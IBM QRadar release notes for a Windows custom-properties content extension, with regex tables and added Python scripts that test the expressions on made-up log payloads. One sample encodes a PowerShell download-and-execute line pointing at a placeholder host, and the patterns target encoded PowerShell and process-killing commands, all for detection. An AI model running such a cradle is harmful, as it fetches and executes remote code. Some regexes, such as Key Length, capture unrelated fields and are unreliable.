Microsoft Windows

Use the IBM Security QRadar Custom Properties for Microsoft Windows Content Extension to expand QRadar searches and reports by normalizing specific event data from a log source. You can also make important data more visible in rules, searches, and reports.

For a list of the event IDs and names that the IBM Security QRadar Custom Properties for Microsoft Windows Content Extension is based on, see here.

Note: This content extension does not install when the Parent Filename custom property is present from Cisco AMP V.1.0.0. Delete Parent Filename before you install this content extension.
Important: To avoid content errors in this content extension, keep the associated DSMs up to date. DSMs are updated as a part of the automatic updates. If automatic updates are not enabled, download the most recent version of the associated DSMs from IBM® Fix Central (https://www.ibm.com/support/fixcentral).

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.7

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.7 adds the Engine Version, Host Version, SID History, Delegation, LDAP Display Name, and Object Class custom properties, updates the Registry Key, Registry Value Name, and Registry Value Data regular expressions, changes the Key Length property type from alphanumeric to numeric, and renames a number of existing properties (for example, EventID becomes Event ID). If your searches, rules, or reports reference a renamed property by its old name, update them to the new name.

Table 1. New and updated Custom Event Properties Expressions in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.7
Name New or Updated Capture Group Regex Description
Engine Version New 1 .*\bEngineVersion=([\.0-9]*)\b.* New custom event property.
Host Version New 1 .*\bHostVersion=([\.0-9]*)\b.* New custom event property.
SID History New 1 .*\s+SID History:\s+(S-\S+)\b.* New custom event property.
Delegation New 1 AllowedToDelegateTo:\s*(.*\S)\s+Old UAC Value: New custom event property.
LDAP Display Name New 1 LDAP Display Name:\s*(.*\S)\s+Syntax \(OID\): New custom event property.
Object Class New 1 Object.*Class:\s*(\S*) New custom event property.
Registry Key Updated 1 TargetObject:\s+(.*?)\\[^\\]+(?:\s+[^:]+|$) Updated regular expression.
Registry Value Name Updated 1 TargetObject:\s+.*?\\([^\\]+?)(?:\s+[^:]+|$) Updated regular expression.
Registry Value Data Updated 1 Details:\s+(.*?)(?:\s+User:\s+|$) Updated regular expression.
Pipe Name Updated - - Changed category to any / any; changed property name from PipeName to Pipe Name.
Key Length Updated - - Changed type from alphanumeric to numeric.
Event ID Updated - - Changed property name from EventID to Event ID.
Object Type Updated - - Changed property name from ObjectType to Object Type.
Group ID Updated - - Changed property name from GroupID to Group ID.
Object Name Updated - - Changed property name from ObjectName to Object Name.
Target Username Updated - - Changed property name from Target User Name to Target Username.
Command Updated - - Changed property name from Process CommandLine to Command.
Task Name Updated - - Changed property name from TaskName to Task Name.
Share Path Updated - - Changed property name from SharePath to Share Path.
Initiator Username Updated - - Changed property name from Initiator User Name to Initiator Username.
Machine Identifier Updated - - Changed the property names Machine ID, Computer Name, and User Workstations to Machine Identifier.
Process ID Updated - - Changed property name from Process Id to Process ID.
Process GUID Updated - - Changed property name from Process Guid to Process GUID.
Parent Process GUID Updated - - Changed property name from Parent Process Guid to Parent Process GUID.
URL Host Updated - - Changed property name from UrlHost to URL Host.
Process Path Updated - - Changed property name from Image to Process Path.
Start Address Updated - - Changed property name from StartAddress to Start Address.
Destination Hostname Updated - - Changed property name from Destination Host Name to Destination Hostname.
Service Filename Updated - - Changed property name from ServiceFileName to Service Filename.
Parent Command Updated - - Changed property name from ParentCommandLine to Parent Command.
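The three updated registry expressions are meant to be read together: a Sysmon registry event carries the full value path in TargetObject and the written data in Details, and the expressions split that into key, value name, and value data. The following Python script is an added example, not code from the content extension, that runs the 1.2.7 Registry Key, Registry Value Name, and Registry Value Data expressions from the table above over three constructed Sysmon payloads (a value-set event, the same event with a value name that contains a space, and a key-create event without a Details field). The process, user, registry path, and field layout are made up for the example; Python's re handles the lazy quantifiers, alternations, and character classes in these expressions the same way as Java's regex engine, so the results carry over.

```python
import re

# Registry expressions copied from the 1.2.7 table above. re.search mirrors how
# a custom event property is applied to the raw payload: the first match wins
# and its capture group becomes the property value.
REGISTRY_KEY = r"TargetObject:\s+(.*?)\\[^\\]+(?:\s+[^:]+|$)"
REGISTRY_VALUE_NAME = r"TargetObject:\s+.*?\\([^\\]+?)(?:\s+[^:]+|$)"
REGISTRY_VALUE_DATA = r"Details:\s+(.*?)(?:\s+User:\s+|$)"

RUN_KEY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"


def sysmon_payload(event_type, target_object, details=None):
    """Build a constructed Sysmon registry payload (fields joined by spaces, as
    the multi-line message looks once it reaches QRadar). Not a real capture."""
    fields = [
        f"EventType: {event_type}",
        "UtcTime: 2024-01-01 12:00:00.000",
        "ProcessGuid: {a0b1c2d3-0000-1111-2222-333344445555}",
        "ProcessId: 4242",
        r"Image: C:\Windows\regedit.exe",
        f"TargetObject: {target_object}",
    ]
    if details is not None:
        fields.append(f"Details: {details}")
    fields.append(r"User: CORP\alice")
    return " ".join(fields)


SAMPLES = {
    # Event ID 13 (value set): persistence through a Run value
    "set_value": sysmon_payload("SetValue", RUN_KEY + r"\Updater", r"C:\Users\Public\u.exe"),
    # Same event, but the value name contains a space
    "set_value_space": sysmon_payload("SetValue", RUN_KEY + r"\My Updater", r"C:\Users\Public\u.exe"),
    # Event ID 12 (key created): no value name and no Details field
    "create_key": sysmon_payload("CreateKey", RUN_KEY),
}


def extract(pattern, payload):
    """Capture group 1 of the first match, or None when the expression does not match."""
    m = re.search(pattern, payload)
    return m.group(1) if m else None


def registry_fields(payload):
    """Split one registry event into the three custom properties."""
    return {
        "Registry Key": extract(REGISTRY_KEY, payload),
        "Registry Value Name": extract(REGISTRY_VALUE_NAME, payload),
        "Registry Value Data": extract(REGISTRY_VALUE_DATA, payload),
    }


if __name__ == "__main__":
    for label, payload in SAMPLES.items():
        print(label, registry_fields(payload))
```

Two results are worth checking against your own payloads before you build rules on these properties: a value name that contains a space is cut at the first space, because both TargetObject expressions end the capture at the next whitespace-delimited word, and for a key-create event (TargetObject ends at the key) the last path element is reported as Registry Value Name and its parent as Registry Key.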

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.6

The Key Length custom property is new to IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.6. This custom property sets the default custom extraction of Key Length from DSM payload.

Table 2. New Custom Event Properties Expressions in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.6
Name Custom Property ID Capture Group Regex
Key Length c732c6c4-3e1d-4116-88c5-b2df0782f711 1 Subject.*?Domain[\:\\\=\s]+(.*?)\s+(?:Logon ID)

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.5

The following table shows the updated regex expressions in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.5.

Table 3. Updated Regex Expressions in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.5
Name Regex Expression ID Optimized Capture Group Regex
File aec96349-bf39-40a6-b549-373a835f7fbd Yes 1 file:.*?\.?[^\\.]+\.(?![0-9]{1,2}\.)([^\\]*?)\sowned\sby
Image Loaded 29f5ac46-341e-49b6-8fc3-513b0cc26c23 Yes 1 ImageLoaded:\s+.[^.\s]+\.(?![0-9]{1,2}\.)([^\\]*?)\s+FileVersion
Object Name 27b28d8b-2876-4e1d-8126-4b643dfe6881 Yes 1 Object Name:\s+.[^.\s]+\.(?![0-9]{1,2}\.)([^\\]*?)\s+Handle
Object Name 4a691bc1-d1a4-4356-8027-2fa93a55c0e5 Yes 1 Object Name:\s+.[^.\s]+\.(?![0-9]{1,2}\.)([^\\]*?)\s+Handle
Object Name ac769579-8e07-4755-aab0-0bc6489c7325 Yes 1 Object Name:\s+.[^.\s]+\.(?![0-9]{1,2}\.)([^\\]*?)\s+Handle
Object Name d9f7021c-7b5f-46ff-8bdf-c7d277052955 Yes 1 Object Name:\s+.[^.\s]+\.(?![0-9]{1,2}\.)([^\\]*?)\s+Handle
Object Name db21bfe3-3ee3-49d2-9160-c28e204649a7 Yes 1 Object Name:\s+.*?\.(?![0-9]{1,2}\.)([^\\]*?)\s+Handle
Relative Target Name 32ac2a10-1a1b-4f40-8296-9275ce9627e0 Yes 1 Relative Target Name:\s+[^.\s]+\.(?!.*\.[0-9]{1,2}\.)([^\\]*?)\s+Access Request Information
Relative Target Name 793f755e-dc59-466c-bf41-67d9715b9be2 Yes 1 Relative Target Name:\s+[^.\s]+\.(?!.*\.[0-9]{1,2}\.)([^\\]*?)\s+Access Request Information
Target Filename 028e41cb-74f7-41d3-b5bd-378c5a1fb01d Yes 1 TargetFilename:\s+.[^.\s]+\.(?![0-9]{1,2}\.)([^\\]*?)\s+CreationUtcTime
Target Filename 9662fc2c-61e5-48cf-9d00-412d7534a0c8 Yes 1 TargetFilename:\s+.[^.\s]+\.(?![0-9]{1,2}\.)([^\\]*?)\s+CreationUtcTime
Target Filename e4349d47-a2dd-46c7-a028-1f1457560a3b Yes 1 TargetFilename:\s+.*?\.([^\\]*?)\s+Hashes

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.4

The following table shows the custom event properties that are new in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.4.

Table 4. New Custom Event Properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.4
Name Optimized Capture Group Regex
Consumer Destination Yes 1 Destination:\s+"(.*?)"$
Relative Target Name No 1 Relative Target Name[:\s\\=]*\s+([^&]*?)\s+Access

The following table shows the custom event properties that have new expressions in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.4.

Table 5. Custom Event Properties with new expressions in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.4
Name Optimized Capture Group Regex
Process Name Yes 1 SourceImage\:\s(?:.*\\)?([\w\.\-\d]+)\sTargetProcessG
Process Path Yes 1 SourceImage\:\s+(.*?)\s+TargetProcessGUID

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.3

The following table shows the custom event properties that are new in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.3.

Table 6. New Custom Event Properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.3
Name Optimized Capture Group Regex
Attribute New Value No 1 Value: ([^\s]*?)(?:\s|$)
Authentication Package Yes 1 Authentication Package:\s+(.*?)\s+Transited
Initiated Yes 1 Initiated:\s+(.*?)\s+SourceIsIpv6
Logon Process Yes 1 Logon Process:\s+(.*?)\s+Authentication
Target Server Name No 1 Target Server Name:\s(.*?)\sAdditional

The following table shows the custom event properties that are updated in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.3.

Table 7. Updated Custom Event Properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.3
Name Optimized Capture Group Regex
PipeName Yes 1 PipeName\:\s(.*)\sImage

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.2

The Process CommandLine custom property received an update to remove a duplicate regex expression.

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.1

The following table shows the custom event properties that have new expressions in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.1.

Table 8. New Custom Event Properties Expressions in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.1
Name Optimized Capture Group Regex
User Domain Yes 1 Subject.*?Domain[\:\\\=\s]+(.*?)\s+(?:Logon ID)

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.0

The following table shows the custom event properties that are new or updated in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.0.

Table 9. New and updated Custom Event Properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.0
Name Optimized Capture Group Regex
File Extension Yes 1 ImageLoaded:\s+.*?\.?[^\\.]+\.(?![0-9]{1,2}\.)([^\\]*?)\s+FileVersion
Filename Yes 1 ImageLoaded:\s+.*?([^\\]*?)\s+FileVersion
Integrity Level Yes 1 IntegrityLevel:\s(\w+)
ParentCommandLine Yes 1 ParentCommandLine:\s(.*)
Process Id Yes 1 ProcessId:\s+(\d+)
Process Name Yes 1 New Process Name[:\s\\=]+.*?\\([^\\]*?)\s+(?:Token Elevation Type:|&&)
Process Name Yes 1 Image:.*?\\([^\\]*?)\sTargetFilename
Process Name Yes 1 Image:.*?\\([^\\]*?)\s(?:FileVersion|CommandLine):

Signed Yes 1 Signed:\s(true|false)

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.8

The following table shows the custom event properties that are new in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.8.

Table 10. New Custom Event Properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.8
Name Optimized Capture Group Regex
Encoded Argument Yes 1 (?i)Process Command Line[:\s]*[a-z\.\s]+[\.\s\-][ncodema^]*[\s^]+(\S+)\s*Token Elevation Type
Encoded Argument Yes 1 (?i)CommandLine:\spowershell[:\s]*[a-z\.\s]+[\.\s\-][ncodema^]*[\s^]+(\S+)\s*CurrentDirectory
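The Encoded Argument property pulls the base64 blob that follows a PowerShell -EncodedCommand style switch (the [ncodema^] class covers -e, -ec, -enc, -EncodedCommand and caret-obfuscated spellings such as -e^n^c) out of a 4688 or Sysmon process-creation payload. What an analyst then needs is the decoded script, which is base64 over the UTF-16LE bytes of the command. The following Python script is an added example, not code from the content extension, that applies both 1.1.8 expressions above to constructed payload fragments and decodes the captured value; the script text, the encoding, and the field order (which follows what the expressions expect) are made up for the example.

```python
import base64
import re

# Both Encoded Argument expressions copied from the 1.1.8 table above.
ENCODED_ARGUMENT = [
    r"(?i)Process Command Line[:\s]*[a-z\.\s]+[\.\s\-][ncodema^]*[\s^]+(\S+)\s*Token Elevation Type",
    r"(?i)CommandLine:\spowershell[:\s]*[a-z\.\s]+[\.\s\-][ncodema^]*[\s^]+(\S+)\s*CurrentDirectory",
]


def encoded_argument(payload):
    """First matching expression wins, as for a multi-expression custom property."""
    for pattern in ENCODED_ARGUMENT:
        m = re.search(pattern, payload)
        if m:
            return m.group(1)
    return None


def decode_encoded_command(value):
    """PowerShell -EncodedCommand is base64 over the UTF-16LE bytes of the script."""
    return base64.b64decode(value).decode("utf-16-le")


# Constructed script and its encoding; not taken from a real incident.
SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENC = base64.b64encode(SCRIPT.encode("utf-16-le")).decode("ascii")

# Constructed payload fragments in the field order the expressions expect.
SAMPLES = {
    # Security 4688 style with the switch spelled out
    "4688": f"Process Command Line: powershell.exe -EncodedCommand {ENC} Token Elevation Type: %%1936",
    # Sysmon style with the abbreviated, caret-obfuscated switch
    "sysmon_caret": f"CommandLine: powershell.exe -e^n^c {ENC} CurrentDirectory: C:\\Users\\alice\\",
    # Sysmon style with other switches before -enc
    "sysmon_switches_first": f"CommandLine: powershell.exe -nop -w hidden -enc {ENC} CurrentDirectory: C:\\Users\\alice\\",
}


if __name__ == "__main__":
    for label, payload in SAMPLES.items():
        value = encoded_argument(payload)
        print(label, "->", decode_encoded_command(value) if value else None)
```

The third sample is the caveat: the [a-z\.\s]+ run between the executable name and the switch cannot cont a hyphen, so when -nop -w hidden precede -enc neither expression matches and the property stays empty. If your environment sees that ordering, a rule on Encoded Argument alone will miss it, and you should pair it with a match on the command line itself.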

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.7

The following table shows the custom event properties that are new or updated in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.7.

Table 11. Updated Custom Event Properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.7
Name Optimized Capture Group Regex
Service Name Yes 1 (?i)Service Name[\:\s\=\\]*(.*?)\s+(?:Service File Name:|&&)
ServiceFileName Yes 1 (?i)Service\sFile\sName\:\s*(.*)\sService\sType

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.6

The following table shows the custom event properties that are new or updated in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.6.

Table 12. Updated Custom Event Properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.6
Name Optimized Capture Group Regex
Process Name Yes 1 Image:.*\\(.*?)\sTargetFilename
Terminated Process Name Yes 1 Process Command Line[:\s\\=]+taskkill\s+\/im\s(.*?)\s\/f
Terminated Process Name Yes 1 Process Command Line[:\s\\=]+(?:net|net1)\s+stop\s(.*?)\s\/y

Target File Directory No 1 cs-bytes[=\s\t](\d+)

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.5

The following table shows the custom event properties that are new or updated in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.5.

Table 13. Updated Custom Event Properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.5
Name Optimized Capture Group Regex
Destination Host Name Yes 1 DestinationHostname:\s+(.+?)\s+
EventID Yes 1 \d{2}\s\d{2}[:\s]\d{2}[:\s]\d{2}\s+\d{4}\s+(\d+)
EventID Yes 1 ^<\d+>[a-zA-Z]{3}[\s]\d{2}[\s]\d{2}:\d{2}:\d{2}[\s][a-zA-Z0-9\.]+[\s]LEEF:[0-9\.a-zA-Z\|]+\|(\d+)
Filename Yes 1 TargetFilename:\s?.*\\(.*?)\s+CreationUtcTime
Process Guid No 1 ProcessGuid: \{(.*?)\}
Process Id No 1 ProcessId:\s+(\d+)
Process Name Yes 1 Image:\s+.*\\(.*)
Process Name Yes 1 Image:.*\\(.*?)\sTargetFilename

Target File Directory Yes 1 TargetFilename:\s+(.*?)\s+CreationUtcTime:
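A custom property can carry several expressions, and the EventID rows above show why: the same Windows event reaches QRadar in different shapes depending on the collector, so one expression is written per format and the first one that matches supplies the value. The following Python script is an added example, not code from the content extension, that applies the two 1.1.5 EventID expressions above together with the key=value expression (?:EventID|EventIDCode|externalId)[:\s\\=]+(\d+) listed under version 1.0.4 further down to three constructed payloads (a key=value payload, a tab-delimited payload with the "dd hh:mm:ss yyyy" timestamp the second expression expects, and a LEEF payload) and to an unrelated syslog line. The payloads are made up for the example and only approximate the real formats.

```python
import re
from typing import Optional

# EventID expressions copied from the page: the key=value form from the 1.0.4
# table and the two forms from the 1.1.5 table above.
EVENT_ID = [
    r"(?:EventID|EventIDCode|externalId)[:\s\\=]+(\d+)",
    r"\d{2}\s\d{2}[:\s]\d{2}[:\s]\d{2}\s+\d{4}\s+(\d+)",
    r"^<\d+>[a-zA-Z]{3}[\s]\d{2}[\s]\d{2}:\d{2}:\d{2}[\s][a-zA-Z0-9\.]+[\s]LEEF:[0-9\.a-zA-Z\|]+\|(\d+)",
]


def event_id(payload: str) -> Optional[str]:
    """Resolve the property the way a multi-expression CEP does: first match wins."""
    for pattern in EVENT_ID:
        m = re.search(pattern, payload)
        if m:
            return m.group(1)
    return None


# Constructed payloads, one per format; none is a real capture.
SAMPLES = {
    # key=value fields separated by tabs
    "key_value": (
        "<13>Jan 01 12:34:56 dc01 AgentDevice=WindowsLog\tAgentLogFile=Security"
        "\tSource=Microsoft-Windows-Security-Auditing\tComputer=dc01.corp.local"
        "\tEventID=4624\tEventIDCode=4624\tEventType=8\tRecordNumber=12345"
        "\tMessage=An account was successfully logged on."
    ),
    # tab-delimited record with a "dd hh:mm:ss yyyy" timestamp followed by the event ID
    "tab_delimited": (
        "dc01.corp.local\tMSWinEventLog\t1\tSecurity\t12345\tMon Jan 01 12:34:56 2024"
        "\t4624\tMicrosoft-Windows-Security-Auditing\tN/A\tN/A\tSuccess Audit"
        "\tdc01.corp.local\tLogon\t\tAn account was successfully logged on."
    ),
    # LEEF header carrying the event ID in its fifth pipe-delimited field
    "leef": (
        "<13>Jan 01 12:34:56 dc01.corp.local LEEF:1.0|Microsoft|Windows|2016|4624|"
        "devTime=Jan 01 12:34:56 2024\tusrName=alice\tcat=Logon"
    ),
    # not a Windows event at all
    "unrelated": "<13>Jan 01 12:34:56 dc01 sshd[2222]: Accepted publickey for alice",
}


if __name__ == "__main__":
    for label, payload in SAMPLES.items():
        print(f"{label}: {event_id(payload)}")
```

When you add an expression of your own to a property like this, test it against every payload format you ingest, not only the one you wrote it for: an expression that is loose enough to match a different format can win before the intended one does and return the wrong field.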

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.4

The following table shows the custom event properties that are new or updated in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.4.

Table 14. Updated Custom Event Properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.4
Name Optimized Capture Group Regex
PipeName Yes 1 PipeName\:\s\\(.*)\sImage

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.3

The following table shows the custom event properties that are new or updated in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.3.

Table 15. Updated Custom Event Properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.3
Name Optimized Capture Group Regex
MD5 Hash Yes 1 MD5=([^\,]+)
MD5 Hash Yes 1 MD5=(\w+)

Process CommandLine Yes 1 Process Command Line[:\s\\=]+(.*?)\s*(?:Token Elevation Type)
Process Name Yes 1 Process Name[:\s\\=]+(?:.*\\)?(.*?)\s+(?:Network Information|\s|&&)
SHA1 Hash Yes 1 SHA1=(\w+)

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.2

All file extension regex values were updated to account for hidden executable extensions (a double extension such as .pdf.exe is captured whole) and to exclude one- or two-digit version segments from the extracted extension.

The following table shows the custom event properties that are new or updated in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.2.

Table 16. Updated Custom Event Properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.2
Name Optimized Capture Group Regex
File Directory Yes 1 ImageLoaded:\s+(.*)\\.*?\s+FileVersion
File Directory Yes 1 TargetFilename:\s+(.*)\\.*?\s+
File Extension Yes 1 OriginalFileName:\s+.*?\.(?![0-9]{1,2}\.)(.*?)\s+Hashes
File Extension Yes 1 TargetFilename:\s+.*?\.?[^\\.]+\.(?![0-9]{1,2}\.)([^\\]*?)\s+Hashes
Filename Yes 1 TargetFilename:\s?.*\\(.*?)\s+Hashes
IMP Hash Yes 1 IMPHASH=(\S+)
MD5 Hash No 1 MD5=([^\,]+)
ObjectType Yes 1 Object Type[:\s\\=]*([^\s&]*)
Process Name Yes 1 Image:.*\\(.*?)\sTargetFilename
Process Name Yes 1 Image:\s+.*\\(.*?)\s
SHA1 Hash No 1 SHA1=(\w+)
SHA256 Hash Yes 1 SHA256=([^\,]+)
Start Address Yes 1 StartAddress:\s(.*?)\s
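The negative lookahead (?![0-9]{1,2}\.) in the File Extension expressions is what implements the two goals stated for 1.1.2: a dot followed by a one- or two-digit segment and another dot is treated as part of a version number and skipped, while any other dot starts the extension, so a double extension is kept whole. The following Python script is an added example, not code from the content extension, that runs the 1.1.2 TargetFilename expression from the table above and the 1.2.5 expression e4349d47-a2dd-46c7-a028-1f1457560a3b from Table 3 (same field and terminator, no lookahead) over three constructed file paths so the difference is visible. The paths and the payload fragment are made up for the example.

```python
import re

# File Extension expressions copied from the page: the 1.1.2 TargetFilename
# expression (with the version-skipping lookahead) and the 1.2.5 expression
# e4349d47-a2dd-46c7-a028-1f1457560a3b from Table 3 (no lookahead).
EXT_1_1_2 = r"TargetFilename:\s+.*?\.?[^\\.]+\.(?![0-9]{1,2}\.)([^\\]*?)\s+Hashes"
EXT_1_2_5 = r"TargetFilename:\s+.*?\.([^\\]*?)\s+Hashes"


def payload(path):
    """Constructed Sysmon-style fragment: TargetFilename followed by Hashes. Not a real event."""
    return f"TargetFilename: {path} Hashes: MD5=00112233445566778899AABBCCDDEEFF"


def file_extension(pattern, path):
    """Capture group 1 of the first match, or None when the expression does not match."""
    m = re.search(pattern, payload(path))
    return m.group(1) if m else None


# Constructed paths covering the cases the lookahead was written for.
CASES = {
    "double extension": r"C:\Users\bob\Downloads\invoice.pdf.exe",
    "short version segments": r"C:\Temp\lib.10.2.dll",
    "three-digit version segment": r"C:\Temp\lib.100.2.dll",
}


def compare():
    """Return (1.1.2 result, 1.2.5 result) for each case."""
    return {
        label: (file_extension(EXT_1_1_2, path), file_extension(EXT_1_2_5, path))
        for label, path in CASES.items()
    }


if __name__ == "__main__":
    for label, (old, new) in compare().items():
        print(f"{label}: 1.1.2 -> {old!r}, 1.2.5 -> {new!r}")
```

For invoice.pdf.exe both expressions return pdf.exe, which is the hidden-executable case a rule on File Extension should look for. For lib.10.2.dll the 1.1.2 expression skips the version segments and returns dll, while the 1.2.5 expression without the lookahead returns 10.2.dll. The third case is the limit of the lookahead: a three-digit segment is not covered by [0-9]{1,2}, so both expressions return 100.2.dll. Check which expression your installed version uses before writing rules that compare File Extension to a fixed list.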

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.1

The following table shows the custom event properties that are new or updated in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.1.

Table 17. Updated Custom Event Properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.1
Name Optimized Capture Group Regex
Record Number Yes 1 RecordNumber=(\d*)


IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.0

The following table shows the custom event properties that are updated in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.0.

Table 18. Updated Custom Event Properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.1.0
Name Optimized Capture Group Regex
File Directory Yes 1 Object Type[:\s\\=]+File[\s\t]+Object Name[:\s\=]+(.*?)\\[^\\]*?\s+(?:Handle ID|&&)
File Directory Yes 1 TargetFilename:\s+(.*)\\.*?\s+
File Extension Yes 1 Object Type[:\s\\=]+File[\s\t]+Object Name[:\s\=]+.*\\.*?\.((?:[^\.]*?\.){0,1}[^\.]*?)\s+(?:Handle ID|&&)
File Extension Yes 1 OriginalFileName:\s+(.*?)\s+Hashes
File Extension Yes 1 TargetFilename:.*\\.*?\.((?:[^\.]*?\.){0,1}[^\.]*?)\s+CreationUtcTime
Filename Yes 1 Object Type[:\s\\=]+File[\s\t]+Object Name[:\s\=]+.*?\\([^\\]*?)\s+(?:Handle ID|&&)
Filename Yes 1 OriginalFileName:\s+(.*?)\s+Hashes
Filename Yes 1 TargetFilename:\s?.*\\(.*?)\s+CreationUtcTime
Hostname Yes 1 Host Name = ([^\s]+)
Image Yes 1 Image:\s*(.+?)\s+FileVersion:
Image Yes 1 Image: (.*?)\s+ImageLoaded
Image Yes 1 Image:\s*(.+?)\s+TargetFilename:
IMP Hash Yes 1 IMPHASH=([^\,]+)
IMP Hash Yes 1 IMPHASH=(\w+)
Machine ID Yes 1 Computer=([^\s]+)
MD5 Hash Yes 1 MD5=([^\,]+)
MD5 Hash Yes 1 MD5=(\w+)
Message Yes 1 subject(?:[^,]*?,){11}([^,]*?)\,
Parent Process Guid Yes 1 ParentProcessGuid: \{(.*?)\}
Parent Process ID Yes 1 ParentProcessId:\s+(\d+)
Parent Process Name Yes 1 ParentImage:\s?.*\\([^\s]+)\sParentCommandLine
Parent Process Path Yes 1 ParentImage:\s*(.+?)\s+ParentCommandLine:
Process CommandLine Yes 1 CommandLine:\s*(.+?)\s+CurrentDirectory
Process CommandLine Yes 1 Scriptblock text.*?:\s+(.*?)\s+ScriptBlock ID
Process Id Yes 1 ProcessId:\s+(\d+)
Process Name Yes 1 CommandLine:\s+"[^\"]*\\([^\"]+)"\s+Current
Process Name Yes 1 Image:\s+.*?\\([^\\]*?)\s+.*$
Process Name Yes 1 Image:.*\\(.*?)\sFileVersion
Process Name Yes 1 Image:.*\\(.*?)\s+ImageLoaded
Process Name Yes 1 Image:.*\\(.*?)\sTargetObject
Process Name Yes 1 Image:.*\\(.*?)\sUser
Process Name Yes 1 Process Name: \s?.*\\([^\s]+)
Process Path Yes 1 Image:\s+(.*)
Process Path Yes 1 Image:\s+(.*?)\s+FileVersion:
Registry Key Yes 1 TargetObject:\s+(.*)\\.*\s+Details:
Registry Value Data Yes 1 Details:\s+(.*)
Rule Name Yes 1 RuleName[:\s\\=]+([^\s&]+)\s+EventType
SHA256 Hash Yes 1 SHA256=(\w+)
SHA256 Hash Yes 1 SHA256=([^\,]+)
Target User Name Yes 1 Account Name:\s+.*?Account Name:\s+([^\s]*)
Token Elevation Type Yes 1 Token Elevation Type: (%%\d{4})
UrlHost Yes 1 (?:(?:http|ftp|tcp|ssl|https):\/\/)(.*?)(?=$|\s|\\|\"|\/|\:|\|)
UrlHost Yes 1 QueryName:\s(.*)\sQueryStatus


IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.0.5

The following table shows the custom event properties that are updated in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.0.5.

Table 19. Updated Custom Event Properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.0.5
Name Optimized Capture Group Regex
GroupID Yes 1 Group ID[:\s\\=]*(\d+)
Parent Process Name Yes 1 Process Name.*\\(.*?)\s+Target Process
Parent Process Name Yes 1 Creator Process Name[:\s]+(?:.*\\)?(.*?)\s+Process Command Line
Parent Process Path Yes 1 Process Name[:\s\\=]+(.*?)\s+(?:Target Process|&&)
Parent Process Path Yes 1 Creator Process Name[:\s]+(.*?)\s+Process Command Line:


IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.0.4

The following table shows the custom event properties that are new or updated in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.0.4.

Table 20. New or Updated Custom Event Properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.0.4
Name Optimized Capture Group Regex
Access Mask Yes 1 Access Mask[:\s\\=]*\s+(0[^\s&]+)
Note: The System.Information expression for this regex is disabled by default, as it can return many event matches and affect performance.
Accesses Yes 1 Accesses[:\s\\=]*(.*?)\s+(?:Access (?:Check Results|Mask|Reasons)|Properties|Privileges|&&|$)
Accesses Yes 1 Operation Type[:\s\\=]*(.*?)(?:\s+Process Information|&&)
Note: The System.Information expression for this regex is disabled by default, as it can return many event matches and affect performance.
Account Security ID No 1 User ID[:\s\\=]*(.*?)\s+(?:Service\s|&&)
